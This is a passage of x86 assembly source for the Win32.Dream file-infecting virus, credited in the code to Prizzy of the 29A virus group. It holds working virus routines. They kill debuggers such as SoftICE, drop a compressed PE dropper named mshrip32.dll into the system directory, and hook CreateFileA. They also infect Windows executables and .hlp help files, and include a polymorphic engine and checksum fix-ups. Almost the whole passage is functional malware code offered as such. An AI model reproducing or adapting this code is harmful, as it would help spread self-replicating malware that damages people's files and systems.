mov [ebp+eax+2],edx
@@7:loop @@6
test al,0C3h
gk32a_f equ $-1
pop eax
push cs ;anti-emulator
lea eax,[ebp+@anti_e-vstart]
push eax
retf
get_k32_apis endp
kill_st proc
call @sNT+10
@s95:db '\\.\SICE',0 ;name drivers
@sNT:db '\\.\NTICE',0
pop ebx
call open_file ;open SoftICE 95/98 or
jz @ks_nt ; SoftICE NT/2k driver
dec eax
push eax
mov eax,0
lpCloseHandle equ $-4
call eax
jmp @ks_kill ;kill process
@ks_nt:
sub ebx,@s95-@sNT ;open the second driver
call open_file
jz @ks_dos
dec eax
call [ebp+lpCloseHandle-vstart]
@ks_kill:
push eax
mov eax,0
lpExitProcess equ $-4
call eax
@ks_dos:
cmp dword ptr fs:[32],0 ;TD32 etc.
jnz @ks_kill
ret
open_always_file:
sub eax,eax ;create file always
push eax ;useful for droppers
mov cl,80h
push ecx 2
jmp $+8
open_file:
sub eax,eax ;open file in ebx
push eax edx 3
cdq
mov dl,0C0h
bswap edx
push eax eax edx ebx
mov eax,0
lpCreateFile equ $-4
call eax
inc eax
ret
kill_st endp
check_resident proc
push ebp 1 0 ;create mutex or get if it
mov eax,0 ;has been created => in mem
lpCreateMutexA equ $-4
call eax
xchg eax,ebx
mov eax,0
lpGetLastError equ $-4
call eax
xchg eax,esi
or esi,esi
jz @cr_f
push ebx
mov eax,0
lpReleaseMutex equ $-4
call eax
@cr_f:or esi,esi
pop eax
jnz __return
jmp eax
check_resident endp
create_process_maps proc
mov byte ptr [ebp+error-vstart],1
call build_dropper ;create dropper in sys dir
jc cpm_fnodeal
mov eax,0
lpGetCurrentProcessId equ $-4
call eax
mov [ebp+if_parent-vstart],eax
sub ebx,ebx
push 80h
cpm_shared_mem equ $-4
push 7
mov eax,0
lpSetErrorMode equ $-4
call eax
pop ecx
lea edi,[ecx+vbody]
push ecx
mov esi,ebp
mov ecx,vsize
rep movsb
cpm_nxproc:
pop eax
lea edi,[eax+8+ebx*8]
push eax
mov [eax],edi
call @@1
dd 0,0,0,0 ;hProc, hThr, ProcID, ThrID
@@1:pop esi
lea eax,[ebp+vsize]
push esi eax 68
pop ecx
@@1a:mov [eax],ch
inc eax
loop @@1a
push ecx ecx 640 1 ecx ecx 80h ecx
cpm_cmdline equ $-5
inc ecx
mov dword ptr [eax-6*4],ecx
mov eax,0
lpCreateProcessA equ $-4
call eax
or eax,eax
jz cpm_failed
lodsd ;get hProcess and ProcessID
stosd
lodsd
lodsd
mov edx,eax
stosd
movzx esi,word ptr [ebp+process_maps+ebx*2-vstart]
neg si
add esi,ebp
movzx ecx,word ptr [esi-2]
mov eax,4096
call malloc
xchg eax,edi
rep movsb ;copy one to mem
pop esi
push esi
movzx eax,byte ptr [ebp+m_sign-2-vstart]
mov [esi+4],eax ;thread memory sign
mov [esi],ecx ;active flag
push esi count-2
lea edi,[esi+apiz]
lea esi,[ebp+k32_addrs-vstart]
pop ecx
@@2:sub eax,eax
lodsw
neg ax
mov eax,[ebp+eax]
stosd
loop @@2
pop esi
push edx ecx 1F0FFFh
mov eax,0
lpRegisterServiceProcess equ $-4
or eax,eax
jz cpm_winnt
push 1 edx
call eax
cpm_winnt:
mov eax,0
lpOpenProcess equ $-4 ;create inside thread from
call eax ;the dropper
xchg eax,ecx
jecxz cpm_failed
mov edx,0
lpWaitForSingleObject equ $-4
call edx, ecx, 40
lodsd
not eax
xchg eax,ecx
jecxz cpm_failed
inc ebx
cmp bl,p_number
jnz cpm_nxproc
mov al,bh ;remove the virus from the
mov ecx,(mem_end - newCreateFile) ;current file, live on the
lea edi,[ebp+newCreateFile-vstart] ;other places inside win32
rep stosb
mov byte ptr [ebp+error-vstart],cl
cpm_failed:
pop eax
or ebx,ebx
jnz cpm_fnodeal
call mdealloc
cpm_fnodeal:
mov eax,[ebp+cpm_cmdline-vstart]
mdealloc:
push eax ;deallocate shared memory
mov eax,0
lpUnMapViewOfFile equ $-4
call eax
ret
error db 0
create_process_maps endp
build_dropper proc
mov eax,260 ;generate dropper filename
call malloc
mov [ebp+cpm_cmdline-vstart],eax
mov edi,eax
push 7Fh eax ;no more then 0x80 chars
mov eax,0
lpGetSystemDirectory equ $-4
call eax ;get system directory
or eax,eax
jz bd_failed
call bd_fname
db '\mshrip32.dll',0 ;hmmm, my dropper name
bd_fname:
pop esi
push 14
mov ebx,edi
add edi,eax
pop ecx
rep movsb
call open_always_file ;create its
jz bd_failed
dec eax
push eax
mov esi,1024 ;alloc memory for dropper
call malloc
xchg eax,edi ;edi=output, all is zero
mov eax,60000
push edi
lea esi,[ebp+dropper_data-vstart]
call malloc
xchg ebx,eax
mov [ebp+cpm_shared_mem-vstart],ebx
mov eax,0
lpGetVersion equ $-4
call eax
xor ecx,ecx
bt eax,63
adc edi,ecx
mov [ebx+paramz+(7-1)*4],edi
pop edi
push edi
mov al,[ebp+m_sign-2-vstart]
mov [esi+224],al ;noone knows what is it
bd_read: ;create EXE PE dropper
xor eax,eax
lodsb
cmp al,-1 ;end of data?
jz bd_done
add edi,eax ;next movement
lodsb
xchg eax,ecx
bd_write:
lodsb
stosb ;save data
loop bd_write
jmp bd_read
E8 equ 0E8
bd_done:
push 0
call @@2
dd ?
@@2:push 1024
push dword ptr [esp+12] ;droppers body
push dword ptr [esp+20] ;file handle
mov eax,0
lpWriteFile equ $-4
call eax
push eax dword ptr [esp+8]
call [ebp+lpCloseHandle-vstart]
pop ecx eax eax ;write error ?
jecxz bd_failed
test al,0F9h
bd_failed equ $-1
ret
radix 16 ;compressed [dropper EXE(PE) 1024 bytes]
dropper_data equ this byte
db 0,5,4Dh,5A,90,0,3,3,1,4,3,2,0FF,0FF,2,1,0B8,7,1,40,23,1,0C0,83,2
db 50,45,2,8,4C,1,1,0,7F,6A,4,38,8,7,0E0h,0,0Fh,1,0Bh,1,6,6,1,2,6,2
db 0C,10,3,1,10,3,1,10,4,1,40,2,1,10,3,1,2,2,1,4,7,1,4,8,1,20,3,1,2
db 2,2,0E6,3Bh,2,1,2,5,1,10,2,1,10,4,1,10,2,1,10,6,1,10,0Bh,2,88,10
db 2,1,28,54,1,10,2,1,8,1Bh,4,2Eh,32,39,41,4,1,0C8,4,1,10,3,1,2,3,1
db 2,0E,1,40,2,1,0C0,20,2,0B8h,10,0A,7E,0E8,45,0,0,0,96,0E8,0,0,0,0
db 5Dh,89,75,9,0EBh,2,90,90,0BBh,0,0,0,0,83,3Bh,0,75,1E,66,0C7,45,6
db 0EBh,28,0E8,1E,0,0,0,33,0C9,53,51,53,50,51,51,0B8,0,0,0,0,-1,0D0
db 0F7,0D0,89,3,6A,0A,0B8,0,0,0,0,0FF,0D0h,0EBh,0CBh,0ADh,56,0EBh,7
db 0E8,2,0,0,0,41,0,33,0F6,0BF,1F,0,0F,0,6A,1,57,0B8,0,0,0,0,-1,0D0
db 56,56,56,57,50,0B9,0,0,0,0,-1,0D1,0C3,E8,0,0,0,0,-1,25,0,10,40,0
db 0,0,0B0,10,0A,2,0BEh,10,3,1,10,16,2,0B8,10,6,0Fh,96,1,50,69,65,0
db 47,44,49,33,32,2E,64,6C,6C,0FF
radix 10
build_dropper endp
malloc proc
pusha ;allocate shared memory
xchg ebx,eax
sub esi,esi
inc byte ptr [ebp+m_sign-2-vstart]
call m_sign
db "@",0
m_sign:
push ebx esi 4 esi 0-1
mov eax,0
lpCreateFileMappingA equ $-4
call eax
dec eax
jz m_failed
inc eax
push ebx esi esi 2 eax
mov eax,0
lpMapViewOfFile equ $-4
call eax
m_failed:
mov [esp+28],eax
popa
or eax,eax
ret
malloc endp
hookapi proc
mov ebx,0
ha_module equ $-4
cmp word ptr [ebx],'ZM'
jnz ha_failed
movzx esi,word ptr [ebx+60]
add esi,ebx
cmp word ptr [esi],'EP'
jnz ha_failed
mov eax,[esi+80h]
add eax,ebx
fk32:mov esi,eax
mov esi,[esi+12]
cmp [esi+ebx],'NREK'
jz fkok
sub eax,-20
jmp fk32
fkok:mov edx,[eax+16]
add edx,ebx
cmp dword ptr [eax],0
jz ha_failed
push edx
mov esi,[eax]
add esi,ebx
mov edx,esi
sub eax,eax
fklp:cmp dword ptr [edx],0
jz ha_failed2
cmp dword ptr [edx+3],80h
jz finc
mov esi,[edx]
lea esi,[esi+ebx+2]
call fnam
db "CreateFileA",0
fnam:pop edi
fcom:push 12
pop ecx
repe cmpsb
jecxz fapi
finc:inc eax
sub edx,-4
jmp fklp
fapi:shl eax,2
add eax,[esp]
xchg ebx,eax
mov eax,[ebx]
mov ecx,[ebp+cpm_shared_mem-vstart]
mov [ecx+vbody+newCreateFile+1-vstart],eax
lea eax,[ecx+vbody+newCreateFile-vstart]
mov [ebx],eax
pop ecx
ret
ha_failed2:
pop eax
ha_failed:
pop eax
jmp __return
hookapi endp
db " Win32.Dream, (c)oded by Prizzy/29A ",13,10
db " The greetz go to all 29A vx coderz ",13,10
newCreateFile proc
push 80h
oldCreateFile equ $-4
pusha
call $+5
pop ebp
sub ebp,$-vstart-1
mov ebx,[ebp+cpm_shared_mem-vstart]
lea edi,[ebx+vbody+vsize]
mov word ptr [edi-vsize+__return+11-vstart],9090h
mov esi,[esp+7*4+12]
ncfc:lodsb
stosb
or al,al
jnz ncfc
lea edi,[ebx+active]
lea esi,[ebx+process] ;infect_file hProcess, ProcID
lodsd
xchg ebx,eax
lodsd
mov byte ptr [edi],1 ;active thread
push eax 0 1F0FFFh
call [ebp+lpOpenProcess-vstart]
xchg eax,ecx
jecxz ncf_failed
ncfw:push 40 ebx
call [ebp+lpWaitForSingleObject-vstart]
cmp byte ptr [edi],0
jnz ncfw
ncf_failed:
popa
ret
newCreateFile endp
start_thread macro thread
pusha ;threads gdelta
push 80h ;Sleep function
call $+5
pop ebp
sub ebp,$-thread-1
mov esi,[esp+40]
IFE st_count NE 0
if_shared_mem equ $-4
push 80h 0 1F0FFFh
if_parent equ $-11
call [esi+apiz+12*4] ;OpenProcess
xchg eax,esi
xchg eax,ebx
or esi,esi
jnz $ + 11 ;terminate all processes
inc esi
mov [ebx+paramz+(6-1)*4],esi
jmp ifex
push esi
call [ebx+apiz+1*4] ;CloseHandle
mov esi,ebx
ELSE
push 1
pop edi
cmp [esi+paramz+(6-1)*4],edi ;terminate this process?
jnz $ + 4
jmp edi
ENDIF
mov eax,[esi+paramz+(7-1)*4]
test al,1
jz $ + 4
mov al,[eax]
lea edi,[esi+active+st_count]
push edi
cmp byte ptr [edi],0
jz @@end
endm
st_count = 0
end_thread macro thread
st_count = st_count + 1
mov edi,[esp]
mov byte ptr [edi],0
@@end:pop edi eax ;sleep function
call eax, 2
popa ;don't terminate
jmp thread
endm
dw check_infected-infect_file
infect_file proc
start_thread infect_file
lea esi,[ebx+vbody+vsize]
ifex:lodsb
cmp al,'.'
jnz ifex
dec esi
lodsd
or eax,20202020h
mov ebx,[esp+44]
lea edi,[ebx+active+4]
lea esi,[ebx+process+8*4] ;infect_exe hProcess, ProcID
cmp eax,'exe.'
jz if_2
cmp eax,'plh.'
jnz if_failed
if_call_hlp:
sub esi,8 ;infect_hlp
dec edi
if_2:lodsd
push eax
lodsd
mov byte ptr [edi],1 ;active infect_exe (_hlp)
push eax 0 1F0FFFh
call [ebx+apiz+4*12] ;OpenProcess
xchg eax,ecx
jecxz if_failed - 1
if_r:pop eax
push eax 40 eax
call [ebx+apiz+4*13] ;WaitForSingleObject
cmp byte ptr [edi],0
jnz if_r
pop eax
if_failed:
end_thread infect_file
infect_file endp
dw create_infected-check_infected
check_infected proc
start_thread check_infected
xchg ebx,esi
xor esi,esi
cmp [ebx+paramz+(5-1)*4],1
jz ci_nomem
other_process_mem macro shared_mem, param ;get mem from other process
call $ + 7
db "1",0
push 1 4
call [shared_mem+apiz+24*4] ;OpenFileMappingA
xor ecx,ecx
push eax ecx ecx ecx 4 eax
call [shared_mem+apiz+7*4] ;MapViewOfFile
push eax
xchg eax,esi
endm
other_process_mem ebx, 4
ci_nomem:
add esi,[ebx+paramz+(4-1)*4]
mov ecx,[esi-4-tbyte] ;number of the terms in a
or ecx,ecx ;equation
jz ci_failed
cmp ecx,8
jnbe ci_failed
sub esp,128
fsave [esp]
push ecx
imul ecx,-(tbyte+tbyte)
sub ecx,tbyte+tbyte+4+tbyte
lea esi,[esi+ecx] ;data starts here
lea edi,[ebx+vbody+vsize+260]
cmp [ebx+paramz+(5-1)*4],1
jnz $ + 8
lea edi,[ebx+vbody+vsize+260+ci_size/2]
neg ecx
push edi
rep movsb
pop esi ecx
push ecx esi
fld tbyte ptr [esi+tbyte] ;derivation of the equations
fld st(0) ;you'll get two tangents
fld tbyte ptr [esi]
fmul
fld1
fsubp st(2),st
fstp tbyte ptr [esi]
fstp tbyte ptr [esi+tbyte]
sub esi,-(tbyte+tbyte)
loop $ - 21
pop esi ecx
sub esp,tbyte+tbyte
fldz
fldz
fstp tbyte ptr [esp]
fstp tbyte ptr [esp+tbyte]
push esi ecx
imul eax,[esp],tbyte+tbyte ;involution of the equations
fld tbyte ptr [esi]
fld tbyte ptr [esi+tbyte]
fld tbyte ptr [esi+eax+tbyte]
fld tbyte ptr [esi+eax]
fld st(2)
fld st(4)
fxch st(2)
lea edx,[ebp+($+32)-check_infected]
push edx
fyl2x ;over natural logarithm
fld st(0)
frndint
fsubr st(1),st
fxch
fchs
f2xm1
fld1
faddp
fscale
fstp st(1)
fmul
ret
fld tbyte ptr [esp+tbyte+2*dword]
faddp
fstp tbyte ptr [esp+tbyte+2*dword]
call $ - 35 ;we've two points on the curve
fld tbyte ptr [esp+2*dword]
faddp
fstp tbyte ptr [esp+2*dword]
sub esi,-(tbyte+tbyte)
dec dword ptr [esp] ;next term in the equation
jnz $ - 85
pop ecx ecx
fld tbyte ptr [esp+tbyte] ;calculate an angle of the
fld tbyte ptr [esp] ;two tangents of the equation
fld st(1)
fld st(1)
fsub
fxch st(2)
fmul
fld1
fadd
fdiv
fabs
fld1
fpatan
push 180 ;radian -> angle
fimul dword ptr [esp]
fldpi
fdiv
pop eax
sub esp,-(tbyte+tbyte)
mov eax,2*tbyte+dword
cmp dword ptr [ebx+paramz+(5-1)*4],1
jnz $ + 12
sub eax,-(dword-ci_size/2)
fld st(0)
fstp tbyte ptr [esi+eax]
fld tbyte ptr [esi+eax]
fsub
sub esp,tbyte
fstp tbyte ptr [esp]
cmp dword ptr [esp+tbyte-dword],0 ;compare the results
lahf
sub esp,-tbyte
wait
fnrstor [esp]
sub esp,-128
sahf
jnz ci_failed
push 1
pop eax
mov [ebx+paramz+(4-1)*4],eax
jmp ci_finish
ci_failed:
xor eax,eax
mov [ebx+paramz+(4-1)*4],eax
ci_finish:
cmp [ebx+paramz+(5-1)*4],1
jz $ + 8
call [ebx+apiz+8*4] ;UnMapViewOfFile
call [ebx+apiz+1*4] ;CloseHandle
end_thread check_infected
check_infected endp
dw infect_hlp-create_infected
create_infected proc
start_thread create_infected
lea edi,[esi+vbody+vsize+260]
push edi
stosd
call $ + 241 ;number of the terms in a
shr eax,29 ;equation
xchg eax,ecx
inc ecx
push ecx
sub esp,128
fnsave [esp]
call $ + 221 ;generate a multiplier (+/-)
sub edx,edx
mov ebx,100000
div ebx
or edx,edx
jz $ - 16
fld1
rcr eax,1
jc $ + 4
fchs
push edx
fimul dword ptr [esp]
fstp tbyte ptr [edi]
pop edx
sub edi,-tbyte
call $ + 119 ;generate an exponent
loop $ - 41 ;next term in the equation
inc ecx
inc ecx
call $ + 110 ;two points on the curve
loop $ - 5
fnrstor [esp]
sub esp,-128
pop eax
stosd
lea ecx,[edi+tbyte]
sub edi,[esp]
xchg eax,edi
pop edi
stosd
pusha ;calculate an angle, it
mov ebx,esi ;means: call other process
mov [esi+paramz+(4-1)*4],ecx
mov [esi+paramz+(5-1)*4],1
lea edi,[esi+active+1]
lea esi,[esi+process+1*8]
lodsd
push eax
lodsd
mov byte ptr [edi],1
push eax 0 1F0FFFh
call [ebx+apiz+4*12] ;OpenProcess
pop esi
push 40 esi
call [ebx+apiz+4*13] ;WaitForSingleObject
cmp byte ptr [edi],0
jnz $ - 9
popa
mov [esi+paramz+(5-1)*4],0
end_thread create_infected
call $ + 66 ;generate an exponent
sub edx,edx
push 11
pop ebx
div ebx
or edx,edx
jz $-14
push edx
fild dword ptr [esp]
call $+15
dt 3FEB8637BD05AF6C69B6r
pop eax ebx
fld tbyte ptr [eax]
xchg ebx,eax
cdq
call $ + 25
mov ebx,1000000
div ebx
push edx
fimul dword ptr [esp]
fsub
fstp tbyte ptr [edi]
pop eax
sub edi,-tbyte
ret
mov eax,0 ;get a random value
lpGetTickCount equ $-4
call eax
add eax,80h
push ecx 33
pop ecx
add eax,eax
jnc $ + 4
xor al,197
loop $ - 6
mov [ebp+($-16)-create_infected],eax
pop ecx
ret
create_infected endp
dw infect_exe-infect_hlp
infect_hlp proc
start_thread infect_hlp
sub esp,16
sub ebx,ebx
mov word ptr [esi+vbody+__return+11-vstart],02EBh
lea eax,[esi+vbody+vsize]
push ebx 80h 3 ebx ebx 0c0000000h eax
call [esi+apiz+4*0] ;open file
inc eax
jz ih_failed
dec eax
push eax
mov bh,80h
push ebx 40h
mov eax,0
lpGlobalAlloc equ $-4
call eax ;GlobalAlloc
mov [esp+4],eax
xchg eax,esi
push 16
pop ecx
sub edx,edx
call read
jc ih_free
lodsd
cmp eax,35f3fh ;hlp signature
jnz ih_free
lodsd
lea edx,[eax+55] ;directory offset
mov ecx,512
lodsd
lodsd
call read
ih_search:
dec ecx
jz ih_free
cmp dword ptr [esi+ecx],'SYS|'
jnz ih_search
cmp dword ptr [esi+ecx+4],'MET'
jnz ih_search
mov eax,[esi-4]
xchg eax,[esi+ecx+8]
xchg eax,edx
push 21
sub esi,-512
pop ecx
call read
lodsd
push 21
pop ecx
sub eax,ecx
add edx,ecx
mov [esp+4+4],edx
mov [esp+8+4],eax
mov edi,[esp+4]
sub edi,-549
lea esi,[ebp+hlp1_s-infect_hlp]
lea eax,[edi+size-hlp1_s]
mov [esp+12+4],eax
push hlp1_e-hlp1_s
pop ecx
rep movsb
push edi
mov ebx,[esp+40+16+8+4]
lea esi,[ebx+vbody]
push esi
sub esi,-vsize
ih_next:
sub esi,4
mov eax,[esi]
call ihck
or edx,edx
jnz ihex
mov al,68h
stosb
mov eax,[esi]
stosd
jmp ihdn
ihex:mov al,0b8h
stosb
mov eax,[esi]
xor eax,edx
stosd
mov al,53
stosb
mov eax,edx
stosd
mov al,80
stosb
ihdn:cmp [esp],esi
jnz ih_next
jmp ihcn
ihck:call ihcv
jc iha1
sub edx,edx
ret
iha1:mov ebx,eax
ihax:mov eax,ebx
call $+9
dd 12345678h
pop edx
sub [edx],12345678h
org $-4
rnd dd 87654321h
mov edx,[edx]
xor [ebp+rnd-infect_hlp],edx
xor eax,edx
call ihcv
jc ihax
xchg eax,edx
call ihcv
jc ihax
xchg edx,eax
ret
ihcv:pusha
push 4
pop ecx
icva:cmp al,' '
jna icvf
cmp al,0f0h
jnbe icvf
cmp al,'"'
jz icvf
cmp al,"'"
jz icvf
cmp al,"`"
jz icvf
cmp al,"\"
jz icvf
ror eax,8
loop icva
test al,0F9h
icvf equ $-1
popa
ret
ihcn:pop eax eax
mov ecx,edi
sub ecx,eax
sub eax,eax
mov [esi+org_ep-vstart],eax
push ecx
sub ecx, p1-hlp1_e+hlp1_e-hlp2_e
mov eax,[esp+12+4+4]
mov [eax],cx
sub esi,vstart-hlp1_e
push hlp2_sz
pop ecx
rep movsb
pop eax
mov esi,[esp+4] ;buffer
sub esi,-528
sub eax,hlp1_s-hlp2_e-21
mov [esi],eax
add [esi+4],eax
mov esi,edi
mov edx,[esp+4+4]
mov ecx,[esp+8+4]
sub eax,ecx
jna ih_free
call read
cmp [esi+4],"`(RR" ;already infected?
jz ih_free
mov ebx,[esp+4]
lea ecx,[edi+eax]
sub ecx,ebx
sub ecx,528
mov eax,[esp+4]
sub eax,-528
mov edx,[eax]
sub edx,ecx
sub [eax],edx
mov edx,[ebx+12]
lea esi,[ebx+528]
call write
mov esi,[esp+4]
push 16
add [esi+12],ecx
sub edx,edx
pop ecx
call write
mov edx,[esi+4]
sub edx,-55
mov ecx,512
sub esi,-16
call write
jmp ih_free
spos:pusha
sub eax,eax
push eax eax edx dword ptr [esp+4*5+8*4]
mov eax,0
lpSetFilePointer equ $-4
call eax
popa
ret
read:call spos
pusha
sub eax,eax
push ecx eax
call $+9
r_ts:dd ?
push ecx esi dword ptr [esp+4*6+8*4]
mov eax,0
lpReadFile equ $-4
call eax
pop ecx
cmp dword ptr [ebp+r_ts-infect_hlp],ecx
jnz $+3
test al,0F9h
popa
ret
write:call spos
pusha
sub eax,eax
push eax
lea ebx,[ebp+r_ts-infect_hlp]
push ebx ecx esi dword ptr [esp+4*5+8*4]
mov eax,[esp+4*5+8*4+4+16+8+40] ;ou! what does it mean :) ?
call [eax+apiz+4*10]
popa
ret
hlp1_s=$
dw 4
dw offset label1-$-2
db "RR(`USER32.DLL',`EnumWindows',`SU')",0
label1=$
dw 4
size dw 0
p1 = $
db "EnumWindows(`"
hlp1_e= $
jmp esp
db "',0)",0
hlp2_e = $
hlp2_sz=hlp2_e-hlp1_e
ih_free:
mov esi,[esp+40+16+4+4]
call [esi+apiz+4*1] ;CloseHandle
mov eax,0
lpGlobalFree equ $-4
call eax
ih_failed:
sub esp,-12
end_thread infect_hlp
infect_hlp endp
dw poly_engine-infect_exe
infect_exe proc
start_thread infect_exe
sub ebx,ebx
lea eax,[esi+vbody+vsize]
push ebx 80h 3 ebx ebx 0c0000000h eax
call [esi+apiz+4*0] ;CreateFileA
inc eax
jz ie_failed
dec eax
push eax ebx eax
mov eax,0
lpGetFileSize equ $-4
call eax
cmp eax,4096
jc ie_close
cmp eax,104857600
jnbe ie_close
mov [ebp+fsize-infect_exe],eax
call $ + 7
db "1",0
push ebx ebx 2 ebx dword ptr [esp+4*5]
call [esi+apiz+4*6] ;CreateFileMappingA
or eax,eax
jz ie_close
push eax ebx ebx ebx 4 eax
call [esi+apiz+28] ;MapViewOfFile
or eax,eax
jz ie_mclose
push eax
cmp word ptr [eax],'ZM'
jnz ie_unmap
cmp word ptr [eax+MZ_crlc],bx
jz ie_tested
cmp word ptr [eax+MZ_lfarlc],64
jc ie_unmap
ie_tested:
mov edi,[eax+MZ_lfanew]
add edi,eax
cmp dword ptr [edi],4550h
jnz ie_unmap
mov eax,[esp+4]
mov [esi+paramz+(3-1)*4],eax
mov eax,[ebp+fsize-infect_exe]
mov [esi+paramz+(4-1)*4],eax
call other_process, 1 ;active check_infected process
cmp [esi+paramz+(4-1)*4],1
jz ie_unmap
call other_process, 2 ;active create_infected process
mov ax,[edi+NT_FileHeader.FH_Characteristics]
test ax,IMAGE_FILE_EXECUTABLE_IMAGE
jz ie_unmap
test ax,IMAGE_FILE_DLL
jnz ie_unmap
movzx ecx,[edi+NT_FileHeader.FH_NumberOfSections]
dec ecx
or ecx,ecx
jz ie_unmap
imul eax,ecx,IMAGE_SIZEOF_SECTION_HEADER
movzx edx,[edi+NT_FileHeader.FH_SizeOfOptionalHeader]
mov [ebp+ie_section-infect_exe],eax
lea ebx,[edx+edi+NT_OptionalHeader.OH_Magic]
add ebx,eax
mov eax,[ebx+SH_SizeOfRawData]
push eax
add eax,[ebx+SH_VirtualAddress]
lea ecx,[esi+vbody+inf_ep-vstart]
mov [ecx],eax
mov eax,[edi+NT_OptionalHeader.OH_AddressOfEntryPoint]
mov [ecx+5+6],eax
call other_process, 5 ;active poly_engine process
pop eax
add eax,[ebx+SH_PointerToRawData]
add eax,[esi+paramz+4*0]
add eax,dword ptr [esi+vbody+vsize+260]
mov ecx,[edi+NT_OptionalHeader.OH_FileAlignment]
add eax,ecx
cdq
dec eax
div ecx
mul ecx
mov [ebp+align_d-infect_exe],eax
call [esi+apiz+4*8] ;UnMapViewOfFile
call [esi+apiz+4*1] ;CloseHandle
sub ebx,ebx
call $ + 7
db "1",0
align_d equ $+1
push 80h ebx 4 ebx dword ptr [esp+4*5]
call [esi+apiz+4*6] ;CreateFileMappingA
push eax ebx ebx ebx 2 eax
call [esi+apiz+4*7] ;thx2 Bumblebee for his help
push eax
add eax,[eax.MZ_lfanew]
xchg eax,edi
mov ebx,0
ie_section equ $-4
movzx edx,[edi+NT_FileHeader.FH_SizeOfOptionalHeader]
lea eax,[edx+edi+NT_OptionalHeader.OH_Magic]
movzx ecx,[edi+NT_FileHeader.FH_NumberOfSections]
add eax,ebx
ie_change_flag:
or [eax.SH_Characteristics],IMAGE_SCN_MEM_WRITE
sub eax,IMAGE_SIZEOF_SECTION_HEADER
loop ie_change_flag
lea eax,[edx+edi+NT_OptionalHeader.OH_Magic]
add ebx,eax
mov eax,[esi+vbody+inf_ep-vstart]
mov [edi+NT_OptionalHeader.OH_AddressOfEntryPoint],eax
pusha
mov ecx,[esi+paramz+4*0]
mov [esp+7*4],ecx
mov edi,[ebx+SH_SizeOfRawData]
add [esp+7*4],edi
add edi,[ebx+SH_PointerToRawData]
add edi,[esp+7*4+4]
lea esi,[esi+vbody+vsize+260+ci_size] ;poly vbody
rep movsb
popa
mov eax,[esi+paramz+4*0]
add eax,[ebx+SH_SizeOfRawData]
mov ecx,[edi+NT_OptionalHeader.OH_FileAlignment]
add eax,ecx
cdq
dec eax
div ecx
mul ecx
mov [ebx+SH_SizeOfRawData],eax
push eax
mov eax,[ebx+SH_VirtualSize]
add eax,vsize+68
mov ecx,[edi+NT_OptionalHeader.OH_SectionAlignment]
add eax,ecx
cdq
dec eax
div ecx
mul ecx
pop ecx
cmp eax,ecx
jnc ie_1
mov eax,ecx
ie_1:mov [ebx+SH_VirtualSize],eax
add eax,[ebx+SH_VirtualAddress]
cmp eax,[edi+NT_OptionalHeader.OH_SizeOfImage]
jc ie_2
mov [edi+NT_OptionalHeader.OH_SizeOfImage],eax
ie_2:or dword ptr [ebx+SH_Characteristics], \
IMAGE_SCN_CNT_CODE or IMAGE_SCN_MEM_EXECUTE or \
IMAGE_SCN_MEM_WRITE
.if dword ptr [edi+NT_OptionalHeader.OH_CheckSum] != 0
mov eax,0
fsize equ $-4
add eax,[esi+paramz+(1-1)*4]
mov [esi+paramz+(2-1)*4],eax
call other_process, 6 ;active checksum process
mov eax,[esi+paramz+(4-1)*4]
mov [edi+NT_OptionalHeader.OH_CheckSum],eax
.endif
push esi
mov edi,[ebp+align_d-infect_exe]
add edi,[esp+4]
lea esi,[esi+vbody+vsize+260]
lodsd
sub eax,4-tbyte
sub edi,eax
xchg eax,ecx
rep movsb
pop esi
ie_unmap:
call [esi+apiz+4*8] ;UnMapViewOfFile
ie_mclose:
call [esi+apiz+4*1] ;CloseHandle
ie_close:
call [esi+apiz+4*1] ;CloseHandle
ie_failed:
end_thread infect_exe
other_process proc
pusha
mov ecx,[esp+36]
mov ebx,esi
lea edi,[esi+active+ecx]
lea esi,[esi+process+ecx*8]
lodsd
push eax
lodsd
mov byte ptr [edi],1
push eax 0 1F0FFFh
call [ebx+apiz+4*12] ;OpenProcess
pop esi
push 40 esi
call [ebx+apiz+4*13] ;WaitForSingleObject
cmp byte ptr [edi],0
jnz $ - 9
popa
ret 4
other_process endp
infect_exe endp
dw checksum-poly_engine
poly_engine proc
start_thread poly_engine
mov ebx,esi
lea esi,[ebx+vbody+vsize]
lea edi,[esi+260+ci_size]
push ebx edi
sub ecx,ecx
mov edx,vsize / 2
mov eax,0E8h
stosd
mov eax,242C8300h
stosd
mov al,5
stosb
@@a:call random
test al,1
jnz @@b
cmp edx,1
jz @@v
sub esi,4
push esi
lodsd
call @@1_a
pop esi
dec edx
jmp @@k
@@b:test al,2
jnz @@c
@@v:dec esi
dec esi
push esi
lodsw
inc ecx
call @@1_a
pop esi
sub cl,cl
jmp @@k
@@c:test al,4
jnz @@e
call @@1 ;push random value DWORD
jc $+7
call @@2
jmp @@l
@@e:inc ecx ;push random value WORD
call @@1
jc $+7
call @@2
sub cl,cl
jmp $+5
@@k:dec edx
jz $+4
@@l:jmp @@a
mov ax,0E4FFh
stosw
jmp pe_failed
@@1:call random ;push random value
test al,1
jnz @@1_d
@@1_a:xchg eax,ebx ;push certain value
@@1_b:jecxz @@1_c ;push WORD
mov al,66h
stosb
@@1_c:call @@3_a
test al,0F9h
@@1_d equ $-1
ret
@@2:call random ;POP reg32 or ADD ESP,4
test al,1
jnz @@2_b
and al,7
cmp al,4
jz @@2
or al,al
jz @@2
jecxz @@2_a
xchg eax,ebx
mov al,66h
stosb
xchg ebx,eax
@@2_a:add al,58h
stosb
ret
@@2_b:mov ax,0C483h
stosw
mov al,4
jecxz @@2_c
mov al,2
@@2_c:stosb
ret
@@3:xchg eax,ebx ;push certain value in EAX
@@3_a:mov al,68h ; in EBX
stosb
xchg eax,ebx
jecxz @@3_b
stosw
ret
@@3_b:stosd
ret
random:
mov eax,0BFF71234h
push ecx 33
pop ecx
@@r:add eax,eax
jnc $+4
xor al,197
loop @@r
mov [ebp+random+1-poly_engine],eax
pop ecx
ret
pe_failed:
pop ecx ebx
sub edi,ecx
mov [ebx+paramz+4*0],edi
end_thread poly_engine
poly_engine endp
dw k32_addrs-checksum
checksum proc
start_thread checksum
xchg ebx,esi
other_process_mem ebx 3 ;get mem from other process
mov ecx,[ebx+paramz+(2-1)*4]
sub edx,edx
shr ecx,1
@@1:lodsw
mov edi,0FFFFh
and eax,edi
add edx,eax
mov eax,edx
and edx,edi
shr eax,10h
add edx,eax
loop @@1
mov eax,edx
shr eax,10h
add ax,dx
add eax,[ebp+4]
mov [ebx+paramz+(4-1)*4],eax
call [ebx+apiz+8*4] ;UnMapViewOfFile
call [ebx+apiz+1*4] ;CloseHandle
end_thread checksum
checksum endp
k32_addrs equ this byte
x equ <vstart->
dw x lpCreateFile
dw x lpCloseHandle
